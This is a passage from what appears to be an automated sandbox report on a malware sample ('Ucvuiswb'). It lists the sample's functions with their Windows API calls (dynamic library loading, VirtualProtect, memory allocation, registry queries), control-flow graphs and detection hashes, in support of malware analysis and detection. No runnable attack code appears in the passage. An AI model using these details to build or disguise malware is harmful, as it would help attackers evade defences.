                                                                                                                            • Opcode ID: 5af09326c51253fa23d2eb422537ff63cc5504c8debbf566f3c7213c590a3fef
                                                                                                                            • Instruction ID: cbbc997c5bb6e4d7bbd36d6f8ec3f9ce2610470df302e8408896ddf2cc1aa655
                                                                                                                            • Opcode Fuzzy Hash: 5af09326c51253fa23d2eb422537ff63cc5504c8debbf566f3c7213c590a3fef
                                                                                                                            • Instruction Fuzzy Hash: 2051F17D6062408FF715CF6CC9E8766BBD4AB45314F1881AED44CCB286EB70D446CB92
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 028B7BE8 Relevance: 4.6, APIs: 3, Instructions: 52libraryloaderCOMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            APIs
                                                                                                                            • LoadLibraryW.KERNEL32(?,00000000,028B7C9A,?), ref: 028B7C18
                                                                                                                            • GetModuleHandleW.KERNEL32(?,?,00000000,028B7C9A), ref: 028B7C1E
                                                                                                                            • GetProcAddress.KERNEL32(0290434C,00000000), ref: 028B7C37
                                                                                                                              • Part of subcall function 028B7B20: GetModuleHandleA.KERNEL32(kernel32,00000000,00000000,028B7BA5,?,?,00000000,00000000), ref: 028B7B61
                                                                                                                              • Part of subcall function 028B7B20: GetProcAddress.KERNEL32(00000000,kernel32), ref: 028B7B67
                                                                                                                              • Part of subcall function 028B7B20: VirtualProtect.KERNEL32(?,?,?,?,00000000,kernel32,00000000,00000000,028B7BA5,?,?,00000000,00000000), ref: 028B7B81
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000018.00000002.1636496572.00000000028A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028A1000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_24_2_28a1000_Ucvuiswb.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: AddressHandleModuleProc$LibraryLoadProtectVirtual
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2543409266-0
                                                                                                                            • Opcode ID: 4756bdc0b5d9ef01bd0063f18a0fcfd75c41b1502de2b07f706acd42c99af3a8
                                                                                                                            • Instruction ID: 625cc786c17de99813e8d3896983b78a14a3c9c445d66715f984bdfcfd7f5f31
                                                                                                                            • Opcode Fuzzy Hash: 4756bdc0b5d9ef01bd0063f18a0fcfd75c41b1502de2b07f706acd42c99af3a8
                                                                                                                            • Instruction Fuzzy Hash: F201E97C604308AFFF04EB6CD9A1A5EB7B9EB84300F542064A218D3784EE7498008F16
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 028A415C Relevance: 3.1, APIs: 2, Instructions: 125COMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 12235 28a415c-28a41a0 12236 28a41a2 12235->12236 12237 28a41a4-28a41d6 call 28a4048 12235->12237 12236->12237 12240 28a41d8-28a41da 12237->12240 12241 28a41df-28a41e6 12237->12241 12240->12241 12242 28a41dc 12240->12242 12243 28a41e8-28a41eb 12241->12243 12244 28a41f0-28a41f6 12241->12244 12242->12241 12243->12244 12245 28a41fb-28a4202 12244->12245 12246 28a41f8 12244->12246 12247 28a4211-28a4215 12245->12247 12248 28a4204-28a420b 12245->12248 12246->12245 12249 28a421b call 28a40f4 12247->12249 12250 28a43ac-28a43be 12247->12250 12248->12247 12254 28a4220 12249->12254 12252 28a43c0-28a43c3 12250->12252 12253 28a43d4-28a43db 12250->12253 12252->12253 12255 28a43c5-28a43d2 12252->12255 12256 28a43ee-28a43f2 12253->12256 12257 28a43dd-28a43e9 call 28a428c call 28a4320 12253->12257 12254->12250 12255->12253 12258 28a4402-28a440b call 28a4090 12256->12258 12259 28a43f4-28a43fb 12256->12259 12257->12256 12268 28a440d-28a4414 12258->12268 12269 28a4416-28a441b 12258->12269 12259->12258 12262 28a43fd-28a43ff 12259->12262 12262->12258 12268->12269 12270 28a4439-28a4442 call 28a4068 12268->12270 12269->12270 12271 28a441d-28a442d call 28a5e00 12269->12271 12276 28a4447-28a444b 12270->12276 12277 28a4444 12270->12277 12271->12270 12278 28a442f-28a4431 12271->12278 12279 28a444d call 28a42f0 12276->12279 12280 28a4452-28a4455 12276->12280 12277->12276 12278->12270 12281 28a4433-28a4434 FreeLibrary 12278->12281 12279->12280 12283 28a4471-28a447e 12280->12283 12284 28a4457-28a445e 12280->12284 12281->12270 12283->12256 12285 28a4460 12284->12285 12286 28a4466-28a446c ExitProcess 12284->12286 12285->12286
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000018.00000002.1636496572.00000000028A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028A1000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_24_2_28a1000_Ucvuiswb.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 0bb8bc12a2b80848937b45a5c1f6d8d54f1068f2835436190cb6a20a71cbf92b
                                                                                                                            • Instruction ID: 9a693b08ff896feb26748754e04ba7dc8b6052310bd37e10e07f9bd4a1eb29a5
                                                                                                                            • Opcode Fuzzy Hash: 0bb8bc12a2b80848937b45a5c1f6d8d54f1068f2835436190cb6a20a71cbf92b
                                                                                                                            • Instruction Fuzzy Hash: 1141BFBCD05248DFEF14DF28E49476A77F1FB08324F64845AD818D7284DBB4A891CB46
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 028A582C Relevance: 1.5, APIs: 1, Instructions: 26COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • GetModuleFileNameA.KERNEL32(13C81B20,?,00000105), ref: 028A584A
                                                                                                                              • Part of subcall function 028A5A90: GetModuleFileNameA.KERNEL32(00000000,?,00000105), ref: 028A5AAC
                                                                                                                              • Part of subcall function 028A5A90: RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 028A5ACA
                                                                                                                              • Part of subcall function 028A5A90: RegOpenKeyExA.ADVAPI32(80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 028A5AE8
                                                                                                                              • Part of subcall function 028A5A90: RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000), ref: 028A5B06
                                                                                                                              • Part of subcall function 028A5A90: RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,00000000,00000005,00000000,028A5B95,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 028A5B4F
                                                                                                                              • Part of subcall function 028A5A90: RegQueryValueExA.ADVAPI32(?,028A5CFC,00000000,00000000,00000000,00000005,?,?,00000000,00000000,00000000,00000005,00000000,028A5B95,?,80000001), ref: 028A5B6D
                                                                                                                              • Part of subcall function 028A5A90: RegCloseKey.ADVAPI32(?,028A5B9C,00000000,00000000,00000005,00000000,028A5B95,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 028A5B8F
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000018.00000002.1636496572.00000000028A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028A1000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_24_2_28a1000_Ucvuiswb.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: Open$FileModuleNameQueryValue$Close
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2796650324-0
                                                                                                                            • Opcode ID: 8a4b19b7324ab4c137f675191953a7ec3a4d1c3d6609a598d8f1dedecf7690e6
                                                                                                                            • Instruction ID: 84e06be41cad6753b4a1aa1c01a8b0a68c90affd47ab032339f2d90c630e8d87
                                                                                                                            • Opcode Fuzzy Hash: 8a4b19b7324ab4c137f675191953a7ec3a4d1c3d6609a598d8f1dedecf7690e6
                                                                                                                            • Instruction Fuzzy Hash: CBE06D79A002248BDB10DE5C88C0A5733D9AB08754F440961EC68CF246D774D9608BD1
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 028A7E3C Relevance: 1.5, APIs: 1, Instructions: 16COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • GetFileAttributesA.KERNEL32(00000000,?,028C1133,ScanString,02900BA8,028C8FEC,OpenSession,02900BA8,028C8FEC,OpenSession,02900BA8,028C8FEC,ScanBuffer,02900BA8,028C8FEC,ScanString), ref: 028A7E47
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000018.00000002.1636496572.00000000028A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028A1000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_24_2_28a1000_Ucvuiswb.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: AttributesFile
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3188754299-0
                                                                                                                            • Opcode ID: 198306c4462bc0bb9e5a1539ed44b571103b139370df0eb3b7b09f60ce76aac9
                                                                                                                            • Instruction ID: f7b36c44e7a80163fcdb1937a2ce4c3d9c8e59394d5316d8ab79b58fca39025d
                                                                                                                            • Opcode Fuzzy Hash: 198306c4462bc0bb9e5a1539ed44b571103b139370df0eb3b7b09f60ce76aac9
                                                                                                                            • Instruction Fuzzy Hash: 81C08CEC6023040E7E5062FC1CE02AD828A194493A7282B21E02CE61D2EF1298323821
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 028C9B54 Relevance: 1.5, APIs: 1, Instructions: 12COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000018.00000002.1636496572.00000000028A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028A1000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_24_2_28a1000_Ucvuiswb.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: Eventtime
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2982266575-0
                                                                                                                            • Opcode ID: 01a32484770319eec6e42924a51a4db1d74b934a8f3bb5500c4d6769e5ed75e7
                                                                                                                            • Instruction ID: 00e30d946c8d94b76d5addf39fd5f72fd7ba8946afb15f239811562b97d4eecb
                                                                                                                            • Opcode Fuzzy Hash: 01a32484770319eec6e42924a51a4db1d74b934a8f3bb5500c4d6769e5ed75e7
                                                                                                                            • Instruction Fuzzy Hash: 20C092F87E53003EF6205AA81CD2F77558DD704B01F601896B700EE2C1DAF2A8201660
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 028A15CC Relevance: 1.3, APIs: 1, Instructions: 38memoryCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • VirtualAlloc.KERNEL32(00000000,00140000,00001000,00000004), ref: 028A15E2
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000018.00000002.1636496572.00000000028A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028A1000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_24_2_28a1000_Ucvuiswb.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: AllocVirtual
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 4275171209-0
                                                                                                                            • Opcode ID: 696658e18e9d2d192498dc70d4f1ca80ad8edee0af211f25018be9aee6bb5d18
                                                                                                                            • Instruction ID: 20109422140bd523a2c1bc0a98d4c29c706312afa18c2e02bed7f51a0528c75e
                                                                                                                            • Opcode Fuzzy Hash: 696658e18e9d2d192498dc70d4f1ca80ad8edee0af211f25018be9aee6bb5d18
                                                                                                                            • Instruction Fuzzy Hash: F0F06DF8B453008FEB06CF7999943117BD6E789345F148679E60DDB398EB71A4028B00
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 028A1682 Relevance: 1.3, APIs: 1, Instructions: 36memoryCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • VirtualAlloc.KERNEL32(00000000,?,00101000,00000004), ref: 028A16A4
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000018.00000002.1636496572.00000000028A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028A1000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_24_2_28a1000_Ucvuiswb.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: AllocVirtual
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 4275171209-0
                                                                                                                            • Opcode ID: 5c3b82809daca46a5213ce5a970d02f3cad5ceeb466d96edba1fd5fb1cb6fb1c
                                                                                                                            • Instruction ID: 8119e90f0b8dea6d03a6945568be55ce25b628d06b580eafe546dee8428ce633
                                                                                                                            • Opcode Fuzzy Hash: 5c3b82809daca46a5213ce5a970d02f3cad5ceeb466d96edba1fd5fb1cb6fb1c
                                                                                                                            • Instruction Fuzzy Hash: 8FF090F6B44B996FE7119E5E9CC4792BBA4FB44314F050179E90CDB344D770A8108B98
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 028A16E6 Relevance: 1.3, APIs: 1, Instructions: 26COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • VirtualFree.KERNEL32(?,00000000,00008000), ref: 028A1704
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000018.00000002.1636496572.00000000028A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028A1000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_24_2_28a1000_Ucvuiswb.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: FreeVirtual
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1263568516-0
                                                                                                                            • Opcode ID: 396f1b8e2edc35d1dc41e9d49478c49f96c84ec049d1bb6fc95089dca802a917
                                                                                                                            • Instruction ID: 42388f769e68de88c88002c315efd9d9ed5485b290de7171b05f3af4d317ccf1
                                                                                                                            • Opcode Fuzzy Hash: 396f1b8e2edc35d1dc41e9d49478c49f96c84ec049d1bb6fc95089dca802a917
                                                                                                                            • Instruction Fuzzy Hash: 3EE0267D3003006FF7105A3D4D88B12BBC9EB84374F240575F209CB2D1CBA0E8008B24
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%